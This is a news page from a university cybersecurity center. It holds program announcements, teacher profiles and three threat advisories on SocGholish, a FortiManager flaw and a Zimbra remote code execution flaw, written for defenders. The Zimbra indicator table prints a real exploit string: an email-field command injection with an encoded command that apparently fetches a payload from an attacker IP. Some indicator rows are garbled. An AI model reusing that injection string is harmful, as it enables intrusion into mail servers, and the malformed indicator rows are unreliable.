News

September 9, 2021

phaseZERO: Innovation Incubator Announced

phaseZERO

Cyber Florida at USF Announces phaseZERO: Innovation Incubator to Boost Cybersecurity Innovation in Florida

December 2, 2024—Tampa, Fla—Cyber Florida at USF is proud to announce the launch of phaseZERO: Innovation Incubator, an innovative seed fund initiative designed to support Florida-based researchers and emerging entrepreneurs in transforming cutting-edge cybersecurity ideas into thriving businesses. With a focus on commercializing cybersecurity innovations, strengthening critical infrastructure, and creating new opportunities, phaseZERO aims to establish Florida as a national leader in cybersecurity entrepreneurship.

Modeled after the Small Business Administration’s SBIR/STTR Phase I programs, phaseZERO addresses critical gaps in seed funding and provides expert mentorship, complementing existing statewide efforts like the Florida High-Tech Corridor, I-Corps, and local incubators and accelerators.

“This program is about removing barriers for innovators,” said Dr. Manish Agrawal, Cyber Florida at USF academic director at Cyber Florida and USF professor. “By providing funding and mentorship without taking equity, we’re enabling Florida’s entrepreneurs to focus on what matters most: building solutions that strengthen our cybersecurity resilience.”

Program Highlights

For this round of funding, phaseZERO will award up to $60,000 each to up to four emerging Florida companies (not to exceed $240,000 total) selected through a rigorous, three-stage evaluation process:

  • Stage 1: Applicants submit a completed application and a brief business plan for technical and business evaluation by a Cyber Florida Entrepreneur-in-Residence (EIR).
  • Stage 2: Selected applicants pitch their plans to an evaluation panel during a virtual event.
  • Stage 3: The evaluation panel selects awardees who receive funding in installments while working with an EIR to establish their business, secure further funding, and prepare for operations.

Funded companies gain access to Cyber Florida’s expansive network of state innovation ecosystem partners, including universities, accelerators, and industry leaders.

Timeline

  • Application Launch: December 2, 2024
  • Application Deadline: January 3, 2025
  • Pitch Event Invitations: January 10, 2025
  • Pitch Event: January 24, 2025

Through phaseZERO, Cyber Florida continues its mission to foster research partnerships, attract cybersecurity companies to Florida, and enable the creation of new ventures.

For more information about phaseZERO, application details, and how to get involved, visit cyberflorida.org/phasezero.

ABOUT CYBER FLORIDA AT USF
The Florida Center for Cybersecurity at the University of South Florida, commonly referred to as Cyber Florida at USF, was established by the Florida Legislature in 2014. Its mission is to position Florida as a national leader in cybersecurity through comprehensive education, cutting-edge research, and extensive outreach. Cyber Florida leads various initiatives to inspire and educate both current and future cybersecurity professionals, advance applied research, and enhance cybersecurity awareness and safety of individuals and organizations.

2024-12-02T13:37:28-05:00December 2, 2024|
Read More

Teacher Spotlight: Amber Jones

Amber Jones

Teacher: Amber Jones

School: Port St. Joe High School

County: Gulf

Amber Jones is an outstanding teacher in Gulf County, Florida. Amber is a dynamic force in cybersecurity education at Port St. Joe High School with 15 years of experience. As the technology teacher for grades 8 through 12, she brings innovation to life through her courses in digital information technology, gaming, and yearbook. Beyond the classroom, she leads as the eSports coach for both junior high and high school, inspires as the girls weightlifting coach, and guides as the senior class sponsor.

Amber’s impressive academic journey includes a degree in business information technology from Troy University and a master’s degree in educational leadership from Grand Canyon University. At home, she is a devoted mother to two wonderful daughters. Her husband plays a pivotal role at Port St. Joe High School as the athletic director and head coach for football, girls weightlifting, and softball.

Next year, Amber plans to bring her students to CyberLaunch 2025 to show off their skills and compete for some really cool prizes! We are so grateful for Amber’s contributions to both the students in Florida and the field of cybersecurity education!

Would you like to be featured in our Teacher Spotlight? To nominate yourself or another deserving teacher, complete the interest form below!

2024-11-26T12:37:11-05:00November 26, 2024|
Read More

SocGholish Holds Top Spot as Leading Malware in Q3 2024

I. Targeted Entities

  • Fortune 500 Companies
  • Government Agencies

II. Introduction

According to The Multi-State Information Sharing and Analysis Center’s (MS-ISAC) monitoring services, SocGholish has retained its position as the most prevalent malware in Q3 2024, accounting for 42% of observed infections. SocGholish is a JavaScript-based downloader that spreads primarily through malicious or compromised websites that present fake browser update prompts to users. Once deployed, SocGholish infections can facilitate further exploitation by delivering additional malicious payloads.

III. Additional Background Information

SocGholish, also known as “FakeUpdates,” has emerged as the leading malware in Q3 2024. This malware has been active since 2018 and operates as a JavaScript-based downloader that exploits drive-by-download techniques to gain initial access. SocGholish primarily spreads through compromised websites, which present fake browser or software update prompts to unsuspecting users. When users download and run the updates, they execute a malicious payload that establishes communication with SocGholish’s command-and-control (C2) infrastructure.

The malware typically delivers its payload via direct download of JavaScript files or, less frequently, within obfuscated ZIP archives to evade detection. The attackers have continued to adapt, using techniques such as homoglyphs in filenames to bypass string-based detection methods. Once deployed, SocGholish conducts reconnaissance on infected systems, identifying users, endpoints, and potentially critical assets such as Active Directory domains. In about 10% of cases, the malware escalates to delivering second-stage payloads, including remote access tools (RATs) like Mythic, replacing previously popular choices like NetSupport.

SocGholish serves as an initial access broker, facilitating further exploitation by delivering additional malware, including ransomware variants such as LockBit and WastedLocker. Its activities are often precursors to larger attacks, making it a critical threat to monitor. Infections may involve domain trust enumeration and script-based data exfiltration, primarily executed in memory, complicating detection efforts. Organizations are advised to implement preventive measures, such as disabling automatic JavaScript execution, monitoring for unusual script activity, and swiftly isolating infected hosts to mitigate the impact of potential intrusions.

IV. MITRE ATT&CK

  • T1059.007 – Command and Scripting Interpreter: JavaScript
    SocGholish payload is executed as JavaScript, aiding in bypassing executable-based detections.
  • T1074.001 – Data Staged: Local Data Staging
    Sends output from whoami to a local temp file (e.g., rad<5-hex-chars>.tmp) for staging prior to exfiltration.
  • T1482 – Domain Trust Discovery
    Profiles compromised systems to identify domain trust relationships for lateral movement.
  • T1189 – Drive-by Compromise
    Distributed through compromised websites with fake update prompts, using drive-by-download techniques.
  • T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
    Exfiltrates data via HTTP directly to the C2 domain to avoid encrypted channels.
  • T1105 – Ingress Tool Transfer
    Downloads additional malware to infected hosts to deepen compromise and persistence.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    Disguises itself as legitimate files like AutoUpdater.js to mimic real software updates.
  • T1027.013 – Obfuscated Files or Information: Encrypted/Encoded File
    Uses ZIP compression and Base-64 encoding to obfuscate JavaScript payloads and URLs.
  • T1566.002 – Phishing: Spearphishing Link
    Distributed via spear-phishing emails with links leading to compromised websites.
  • T1057 – Process Discovery
    Lists processes on targeted hosts to understand the environment.
  • T1518 – Software Discovery
    Identifies the victim’s browser to deliver the appropriate fake update page.
  • T1082 – System Information Discovery
    Collects system details, such as computer name, for context-specific targeting.
  • T1614 – System Location Discovery
    Uses IP-based geolocation to focus infections on North America, Europe, and parts of the Asia-Pacific region.
  • T1016 – System Network Configuration Discovery
    Enumerates domain name and Active Directory membership for potential privilege escalation.
  • T1033 – System Owner/User Discovery
    Uses whoami to obtain username information from compromised hosts.
  • T1204.001 – User Execution: Malicious Link
    Lures users into interacting with malicious links on compromised websites, triggering the malware.
  • T1102 – Web Service
    Uses Amazon Web Services to host second-stage servers, leveraging legitimate infrastructure.
  • T1047 – Windows Management Instrumentation (WMI)
    Employs WMI for script execution and system profiling to gather information stealthily.

V. Immediate Recommendations

  • Endpoint Detection and Response – Deploy EDR solutions to monitor and detect unusual behavior indicative of SocGholish activity, such as unexpected script execution or unauthorized C2 communications.
  • Restrict JavaScript Execution – Disable the execution of JavaScript on websites which are untrusted.
  • Regular Vulnerability Patching – Patch browsers, plugins, and other software regularly to reduce the risk of drive-by-download attacks.
  • Browser Hardening – Enforce browser settings to block pop-ups and auto-downloads from untrusted sources.
  • Anomalous Traffic Detection – Use network monitoring tools to detect and alert on unusual HTTP traffic patterns that may indicate SocGholish communication.
  • User Awareness Training – Regularly train employees on the risks of fake browser update prompts and how to identify phishing attempts.
  • Incident Response Plan (IRP) – Develop and test an incident response plan specifically addressing SocGholish-related threats, ensuring it includes steps for rapid isolation and containment.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP

83[.]69[.]236[.]128
IP

88[.]119[.]169[.]108
IP

91[.]121[.]240[.]104
IP 185[.]158[.]251[.]240
IP 185[.]196[.]9[.]156
IP 193[.]233[.]140[.]136
IP 31.184.254[.]115
Domain aitcaid[.]com
Domain 0qsc137p[@]justdefinition.com 
Domain advancedsportsandspine[.]com
Domain automotivemuseumguide[.]com
Domain brow-ser-update[.]top
Domain circle[.]innovativecsportal[.]com
Domain  marvin-occentus[.]net
Domain photoshop-adobe[.]shop
Domain pluralism[.]themancav[.]com
Domain scada.paradizeconstruction[.]com
Domain storefixturesandsupplies[.]com
Domain 1sale[.]com
Domain taxes.rpacx[.]com
Domain *.signing.unitynotarypublic[.]com
Domain *.asset.tradingvein[.]xyz
Domain Column 2 Value 23
Domain change-land[.]com

VI. Additional OSINT Information

SocGholish operates as a JavaScript-based malware loader that initially infects victims through compromised websites, presenting them with fake browser or software update prompts. Once users click to “update,” the malware executes a JavaScript payload, connecting back to the attacker’s command and control (C2) server to deliver additional payloads.

Image 1 of SocGholish Payload Delivery

Image 2 of SocGholish Payload Delivery

Image 3 of SocGholish Payload Delivery via Fake Google Alerts

Payload details:

  • Primary Payload: The initial JavaScript script collects system and user information, which it sends back to the C2 server, enabling the attacker to assess the target for further exploitation. This reconnaissance phase helps the malware operators determine the value of the target and the appropriate secondary payloads to deploy.
  • Secondary Payloads: SocGholish is known to deploy additional malware based on the information gathered. Historically, it used the NetSupport RAT for remote access but has evolved to favor other tools. Since 2022, SocGholish shifted its preference to more advanced payloads, including:
  • Cobalt Strike: This well-known post-exploitation tool allows attackers to conduct further reconnaissance, privilege escalation, and lateral movement within networks. However, recent reports show a transition to using Mythic, an alternative to Cobalt Strike.
  • Mythic: A versatile open-source command and control framework used for post-compromise operations, allowing attackers to load additional modules and control infected systems stealthily.
  • Reconnaissance and Lateral Movement: The secondary payload often includes commands for system discovery and Active Directory enumeration. Common tools used in this phase include nltest.exe for domain trust discovery and whoami for privilege reconnaissance.
  • Ransomware Associations: SocGholish has acted as an initial access broker, facilitating access for ransomware groups such as LockBit and WastedLocker. This handoff process enables ransomware operators to capitalize on SocGholish’s infiltration to execute ransom demands or further network disruption.

By delivering these targeted payloads, SocGholish operators can gain persistent access, conduct extensive reconnaissance, and potentially disrupt critical systems. These payloads make SocGholish not only a potent malware threat but also a significant enabler of larger ransomware and espionage campaigns across various industries.

VII. References

The Center for Internet Security, Inc (October 23, 2024) Top 10 Malware Q3 2024 https://www.cisecurity.org/insights/blog/top-10-malware-q3-2024

Red Canary (2024) SocGholish https://redcanary.com/threat-detection-report/threats/socgholish/

MITRE ATT&CK (March 22, 2024) SocGholish https://attack.mitre.org/software/S1124/

Blackpoint Cyber (June 21, 2024) AsyncRAT, NetSupport RAT, and VssAdmin Abuse for Shadow Copy Deletion https://blackpointcyber.com/resources/blog/asyncrat-netsupportrat-vssadmin-abuse-for-shadow-copy-deletion-soc-incidents-blackpoint-apg/

Proofpoint (November 22, 2022) Part 1: SocGholish, a very real threat from a very fake update https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update

ReliaQuest (January 30, 2023) SocGholish: A Tale of FakeUpdates https://www.reliaquest.com/blog/socgholish-fakeupdates/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker.

2024-11-25T10:41:29-05:00November 25, 2024|
Read More

Red Dragon Rising II: China in Cyberspace

Join as we once again convene some of the world’s leading scholars to discuss China’s power projection through cyberspace. Since this group last convened, the world has seen an explosion in the availability and use of artificial intelligence (AI) as well as an extension of the digital attack surface. Some questions they’ll ponder include: How might an AI capability enhance China’s security? What is China’s current cyberspace strategy and how might it be augmented by AI? Will AI make China more effective with cyber-enabled information operations, cyber espionage, and offensive cyber? How might China’s terrestrial ambitions be reflected in cyberspace? Don’t miss this opportunity to hear some of the top experts discuss cyberspace, China, and national security!

Moderator: Dr. Mark Grzegorzewski

Panelists:

2025-01-06T10:12:26-05:00November 22, 2024|
Read More

Cyber Florida at USF’s SOCAP Builds Cyber Talent Pipeline

Cyber Florida at USF SOCAP

Cyber Florida at USF’s Security Operations and Cybersecurity Apprenticeship Program (SOCAP) employs up to 10 students each semester, with opportunities for students to remain in the program for multiple terms. Through this innovative program, SOCAP interns gain hands-on experience addressing real cybersecurity issues for various clients, effectively extending the capabilities of client IT teams.

Managed by Ryan Irving and Duy Dao, SOCAP gives students valuable exposure to the day-to-day operations of a security operations center. Leveraging tools like Microsoft Defender, Crowdstrike, Stamus Networks, MS-ISAC Albert, Recorded Future, Magnet Forensics, Belkasoft Forensics, Volexity, and more, Irving assigns work tickets—real security alerts or issues—that need investigation. Each day, students select or are assigned tickets from the system, allowing them to work on current cybersecurity tasks and engage in practical problem-solving.

The University of South Florida (USF) Information Technology (IT) Department is among the clients benefiting significantly from SOCAP’s services. “The SOCAP partnership with USF IT is fantastic,” says Irving. “Students aren’t just performing real cybersecurity tasks; they’re actively improving the security of the university’s IT infrastructure while honing their skills in a real-world environment.”

In addition to ticket-based troubleshooting, SOCAP students take on proactive threat-hunting roles, scouring resources to detect potential indicators of compromise and preparing threat advisories for Cyber Florida’s threat room page on its website.

SOCAP students like Alessandro Lovadina, Erika Delvalle, and Ben Price bring diverse skills and interests, creating a collaborative team environment.

Lovadina is passionate about coding projects, like building web applications. “With AI, cybersecurity is crucial; all students should learn the basics of cybersecurity,” he notes.

Delvalle finds excitement in threat-hunting tickets. “It never gets boring,” she says. “You’re always learning something new.”

Price enjoys challenging issues that expand his research skills and expertise. “It’s fulfilling; it’s important,” he says.

SOCAP students have the freedom to conduct their own research and troubleshoot using open-source information and reliable online resources. The program’s hybrid format allows students to work both in-office and remotely, providing a dynamic environment that complements their class schedules. This flexibility gives SOCAP interns a comprehensive view of security operations and invaluable career experience.

Irving also incorporates regular training exercises in collaboration with the USF IT team. “Monthly simulated events allow students and staff to practice incident response skills together,” he says. “We invite USF IT to join these sessions, so that we can learn and improve our response capabilities as a team.”

Dennis Guillette, Director and Security Architect of USF IT, expressed his appreciation for SOCAP students’ contributions to the university’s cybersecurity efforts. “I would like to extend my deepest gratitude to the SOCAP students for their outstanding hard work and dedication. Their impressive technical knowledge and exceptional troubleshooting skills have been invaluable to our security posture. Their commitment to excellence and ability to tackle complex security challenges have significantly strengthened us. Thank you for setting a high standard of professionalism and expertise.”

Cyber Florida’s SOCAP internship program at USF continues to be a valuable resource for students and the university alike, advancing cybersecurity skills and bolstering the state’s defenses. It serves as a model for other schools.

2024-11-22T10:05:03-05:00November 22, 2024|
Read More

Critical Vulnerability in Fortinet FortiManager Under Active Exploitation

I. Targeted Entities

  • Fortinet FortiManager Customer
  • Managed Service Providers

II. Introduction

A critical vulnerability has been identified in Fortinet’s FortiManager platform, a centralized management solution for Fortinet security products. This vulnerability, tracked as CVE-2024-47575, allows for remote code execution (RCE) by unauthorized attackers. The exploitation of this vulnerability is currently active in the wild, posing a significant threat to affected organizations. If successfully exploited, attackers could gain access to critical systems, install malicious programs, and manipulate sensitive data. Fortinet and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued advisories urging organizations to take immediate action by applying the latest patches to mitigate risks.

FortiManager is widely deployed across sectors, including government, telecommunications, financial services, and healthcare, making this vulnerability particularly concerning. Given the increasing sophistication of cyberattacks, unpatched systems present a high risk, allowing attackers to potentially escalate privileges and compromise network infrastructures.

III. Additional Background Information

In October 2024, a critical vulnerability was discovered in Fortinet’s FortiManager, a network management solution widely used to centrally configure and monitor Fortinet devices. This vulnerability, tracked as CVE-2024-47575, exploits a missing authentication mechanism in the fgfmd daemon, allowing attackers to execute arbitrary code remotely without valid credentials. Fortinet and CISA have confirmed that malicious actors are actively targeting both on-premises and cloud-based instances of FortiManager through specially crafted requests, leveraging this flaw to compromise network environments.

The exploit is aligned with tactics defined in the MITRE ATT&CK framework, specifically T1190 – Exploit Public-Facing Application, indicating that adversaries are using exposed FortiManager instances as initial access points. Once inside, attackers can install backdoors, modify security configurations, and delete or manipulate data, depending on the privileges of the compromised service accounts. Higher-privileged accounts can allow attackers to escalate their control leading to significant disruptions.

Previous incidents involving vulnerabilities in network appliances highlight the severity of such attacks. FortiManager’s broad adoption across multiple critical infrastructures and industries make it an attractive target. Unpatched instances are especially vulnerable to this exploit. Additionally, this vulnerability exposes connected Fortinet devices, allowing attackers to disable firewalls or VPNs and undermine network defenses.

Organizations are strongly advised to apply the latest patches immediately, perform vulnerability assessments, and monitor for indicators of compromise (IoC). Fortinet has released mitigation guidelines, emphasizing the importance of updating software, segmenting networks, and limiting administrative access to prevent further exploitation. Failure to act could result in severe operational disruptions and data breaches, particularly for critical infrastructure providers and enterprises that rely heavily on Fortinet’s security infrastructure.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    Attackers exploit the public-facing FortiManager application via a missing authentication flaw. This vulnerability allows unauthorized attackers to execute arbitrary code on FortiManager by sending specially crafted requests, gaining initial access to the system and enabling control over FortiGate devices connected to the network.
  • T1078 – Valid Accounts
    The threat actors leverage valid certificates on unauthorized FortiManager and FortiGate devices, allowing them to register these devices on exposed FortiManager instances. By mimicking legitimate access, the attackers avoid raising immediate security alerts and maintain a low profile for further exploitation and lateral movement within the network.
  • T1036 – Masquerading
    Attackers register rogue FortiManager devices under misleading names (e.g., “localhost”) and legitimate-seeming serial numbers (e.g., FMG-VMTM23017412). This technique helps obscure threat actor activity within FortiManager logs and console, allowing the attacker’s device to appear as if it is part of the legitimate infrastructure.
  • T1041 – Exfiltration Over C2 Channel
    Exfiltration of FortiManager and FortiGate configuration files occurs over encrypted Command and Control (C2) channels, leveraging HTTPS to avoid detection by security tools. The threat actor UNC5820 has been observed using specific IP addresses to exfiltrate compressed files containing sensitive configuration information, user credentials, and device data.
  • T1587.003 – Develop Capabilities: Digital Certificates
    Attackers leverage valid digital certificates on FortiManager and FortiGate devices to masquerade malicious activities as legitimate. With these certificates, unauthorized devices can connect to FortiManager, bypassing certain security configurations and enabling persistent access to compromised networks.
  • T1562.001 – Impair Defenses: Disable or Modify Tools
    Attackers modify FortiManager configuration to evade detection. By using commands such as fgfm-deny-unknown, attackers can prevent detection of unauthorized devices. This adjustment allows attackers to sustain their unauthorized access, mitigating the chances of detection during ongoing operations.
  • T1027 – Obfuscated Files or Information
    Attackers use gzip compression on the /tmp/.tm archive, which stores exfiltrated configuration data, to obfuscate and minimize visibility of extracted data. This technique reduces the file’s detection footprint, making it harder to identify during data exfiltration stages.
  • T1040 – Network Sniffing
    While not directly observed in this incident, the configuration data exfiltrated includes sensitive details like IPs and credentials. This could indicate an intention to use network sniffing techniques or other credential-monitoring tactics to further penetrate or maintain persistence in the target network.

V. Immediate Recommendations

  • Install Security Updates:
    • Fortinet has solved CVE-2024-47575 with fixes. To address the found security flaw and reduce the risk of active exploitation, organizations should give top priority to installing these updates on all FortiManager instances, including on-premises and cloud-based.
  • Monitor for Compromise Indicators (IoCs):
    • Check network traffic and system logs often for known IoCs linked to this attack, such as file paths, flagged IP addresses, MD5 hash values, and log entries that might point to exploitation (see to the IoCs section for references). To improve detection capabilities, incorporate these IoCs into your SIEM or IDS/IPS.
  • Establish an Incident Response Plan:
    • Create or revise an incident response plan that includes steps for handling FortiManager vulnerability exploitation. Make sure your reaction team is equipped and trained to deal with any possible Fortinet system breaches.
  • Isolate Compromised Systems:
    • Isolate compromised systems right away to stop additional access or harm if any indications of compromise are found. Notify the affected parties and carry out a comprehensive investigation, eliminating any malware or backdoors.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP

45.32.41[.]202 
IP

195.85.114[.]78 
IP

104.238.141[.]143 
IP 158.247.199[.]37 
IP 45.32.63[.]2 
File /tmp/.tm 
File /var/tmp/.tm 
MD5 Hash of unreg_devices.txt  9DCFAB171580B52DEAE8703157012674 
Email address 0qsc137p[@]justdefinition.com 
Log Entry type=event,subtype=dvm,pri=information,desc=”Device,manager,generic,information,log”,user=”device,…“,msg=”Unregistered device localhost add succeeded” device=”localhost” adom=”FortiManagersession_id=0 operation=”Add device” performed_on=”localhost” changes=”Unregistered device localhost add succeeded” 
Log Entry type=event,subtype=dvm,pri=notice,desc=”Device,Manager,dvm,log,at,notice,level”,user=”System”,userfrom=”“,msg=”” adom=”root” session_id=0 operation=”Modify device” performed_on=”localhost” changes=”Edited device settings (SN FMG-VMTM23017412)” 
String revealing exploitation activity in /log/locallog/elog  msg=”Unregistered device localhost add succeeded” 
String revealing exploitation activity in /log/locallog/elog  changes=”Edited device settings (SN FMG-VMTM23017412)” 
String revealing exploitation activity in /log/locallog/elog  changes=”Added unregistered device to unregistered table. 

VII. References

The Channel CO, CRM (October 24, 2024) 5 Things To Know On The Fortinet FortiManager Attacks  https://www.crn.com/news/security/2024/5-things-to-know-on-the-fortinet-fortimanager-attacks
 

Bleeping Computer (October 23, 2024) Fortinet warns of new critical FortiManager flaw used in zero-day attacks
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/ 

Google Cloud (October 23, 2024) Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575) https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575 

 New York State (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://its.ny.gov/2024-120 

 Bleeping Computer (October 24, 2024) Mandiant says new Fortinet flaw has been exploited since June https://www.bleepingcomputer.com/news/security/mandiant-says-new-fortinet-fortimanager-flaw-has-been-exploited-since-june/ 

 CVE (October 23, 2024) CVE-2024-47575 https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2024-47575 

 Fortigaurd (October 17, 2024) Missing authentication in fgfmsd https://www.fortiguard.com/psirt/FG-IR-24-423 

 MS-ISAC (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://learn.cisecurity.org/webmail/799323/2307481671/eb748002d95238b2d31f1dc45b527f271478b2fb5b4d5ee93eb20f05d2825fce

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker. 

2024-11-12T12:00:23-05:00November 12, 2024|
Read More

Belonging in a Changing Cyber World: Community, Careers, and Resilience

Belonging in a Changing Cyber World: Community, Careers, and Resilience

In this episode of Do We Belong Here, Tashya Denose and Pam Lindemoen dive into the evolving landscape of the cyber industry over the past several years. They discuss the impact of the global pandemic on remote work and the shifts that have followed, the ongoing challenges between job openings and the availability of qualified candidates, and the potential long-term effects on the future of the industry and its professionals. They also share personal updates from the past few months, reminding us that with community and good friends, we always have a place where we belong.

Stream the Do We Belong Here documentary on YouTube: https://www.youtube.com/@cybersecurityfl

Follow us on social media: @DoWeBelongPod

2024-11-06T10:51:02-05:00November 7, 2024|
Read More

The McCrary Institute: Securing America’s Digital Future

WASHINGTON, Oct. 22, 2024 /PRNewswire/ — Today, Auburn University’s McCrary Institute for Cyber and Critical Infrastructure Security—a Cyber Florida at USF partner organization—and the Cyberspace Solarium Commission 2.0 released a timely report entitled “Securing America’s Digital Future: A Bipartisan Cybersecurity Roadmap for the Next Administration.” The report includes dozens of recommendations for improving the cybersecurity of the United States, based on input from the task force’s subject matter experts. To develop the report, the task force consisted of thought leaders in the field of cyber policy, including industry experts and former federal officials. Among those who contributed to the report was Cyber Florida at USF Director Ernie Ferraresso, who is also a Senior Fellow at the McCrary Institute.

The report includes dozens of recommendations for improving the cybersecurity of the United States, based on input from the task force’s subject matter experts.

The report includes dozens of recommendations for improving the cybersecurity of the United States, based on input from the task force’s subject matter experts.

“With the release of this important report, we are offering the next administration a set of sound policy recommendations to further improve national security in the face of growing cybersecurity threats,” said Frank Cilluffo, director of the McCrary Institute. “Thanks to the tireless efforts of our distinguished panel of experts, these recommendations come at a critical time in the cyber policy arena, and we look forward to engaging the next administration to advance these proposals.”

Mark Montgomery, Executive Director of the Cyberspace Solarium Commission 2.0 added, “The cyber threats to U.S. critical infrastructure emanating from both state and non-state adversaries continues to evolve and grow, and so must our policy approach to mitigating them. I am pleased that this impressive cohort of subject matter experts came together with actionable recommendations to address some of the most pressing policy questions facing government and industry today.”

The task force recommendations include calls to harmonize a cumbersome regulatory landscape; improve coordination across federal agencies; provide exercised playbooks for stakeholders to prepare for and respond to cyber attacks; develop a process for labeling state sponsors of cybercrime; develop a system for critical asset identification; establish standards for cloud, IT, and OT security; improve cyber workforce development and retention; and resource key organizations more effectively, among many others. Irrespective of the outcome of the upcoming presidential election, these task force recommendations will provide a framework for the incoming administration to engage in important policy efforts and improve the security of U.S. critical infrastructure.

The McCrary Institute, based at Auburn University with additional centers in Washington, D.C., and Huntsville, seeks practical solutions to pressing challenges in the areas of cyber and critical infrastructure security. Through its three hubs, the institute offers end-to-end capability — policy, research and education — on all things cyber-related.

To learn more and download a copy of the report, please visit https://eng.auburn.edu/mccrary/pttf/index.

2024-11-12T13:58:26-05:00October 30, 2024|
Read More

Zimbra Collaboration RCE Vulnerability

I. Targeted Entities

  • Small to Medium Government and Business Entities

II. Introduction

A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra’s postjournal service, which processes incoming emails over SMTP. This vulnerability allows attackers to compromise servers by sending specially crafted emails that trigger arbitrary command execution through the server’s CC field. Once exploited, the vulnerability can be used to install web shells, providing attackers full access to the compromised server and enabling further network infiltration.

III. Additional Background Information

Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    • The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
  • T1505.003 – Server Software Component: Web Shell
    • The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
  • T1059.004 – Command and Scripting Interpreter: Unix Shell
    • The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
  • T1071.001 – Application Layer Protocol: Web Protocols
    • The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
  • T1105 – Ingress Tool Transfer
    • Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
  • T1132.001 – Data Encoding: Standard Encoding
    • The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    • The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.

V. Recommendations

  • Patch Management
    • Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
  • Monitoring and Logging
    • Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
  • Access Control
    • Properly configure Zimbra’s “mynetworks” parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization’s operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed
  • Service Management
    • Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
  • Vendor Communication

    • Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP Address

79.124.49[.]86
Port

10027
Base64-encoded String

ppp’echo${IFS} Li4vLj4vY29tbW9uL2Jpbi 9jdXJsIGh0dHA6LY830S 4xMjQuNDkuODY6NDQZL 3RwdnRnYmp3ZWV2dnV vbWJ5d2xrdGhsbGpkdXB 4Znlz|base64$(IFS)-di [email protected]

VII. References

Dark Reading. (October 1, 2024). Zimbra RCE Vuln Under Attack Needs Immediate Patching. https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now

BleepingComputer. (October 2, 2023). Critical Zimbra RCE flaw exploited to backdoor servers using emails. https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/

SOCRadar. (October 02, 2024). RCE Vulnerability in Zimbra (CVE-2024-45519). https://socradar.io/rce-vulnerability-in-zimbra-cve-2024-45519/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, Benjamin Price

2024-10-28T11:58:24-04:00October 28, 2024|
Read More

Teacher Spotlight: Tina Vieira

Tina Vieira

Teacher: Tina Vieira

School: Nature Coast Technical High School

County: Hernando

With 19 years of dedicated experience in Hernando County Schools, Tina Vieira has made a remarkable impact on education. Throughout her career, Tina has taught multiple subjects, served as a district writing coach and ESOL compliance specialist, and helped develop new computer science standards in collaboration with the Department of Education.

Driven by her commitment to technology education, Tina transitioned to computer science and now leads a range of technology courses at Nature Coast Technical High School. Her influence goes beyond the classroom, as she also trains educators across Florida, helping shape the future of computer science education statewide.

Tina’s passion for empowering students shines through in her words: “Seeing kids learn skills that are not only in high demand but will also set them up for a successful future is incredibly rewarding for me.” Her dedication to fostering student growth and success is evident in her students’ involvement in cyber competitions.

Beyond her professional achievements, Tina enjoys spending time on the water with her family.

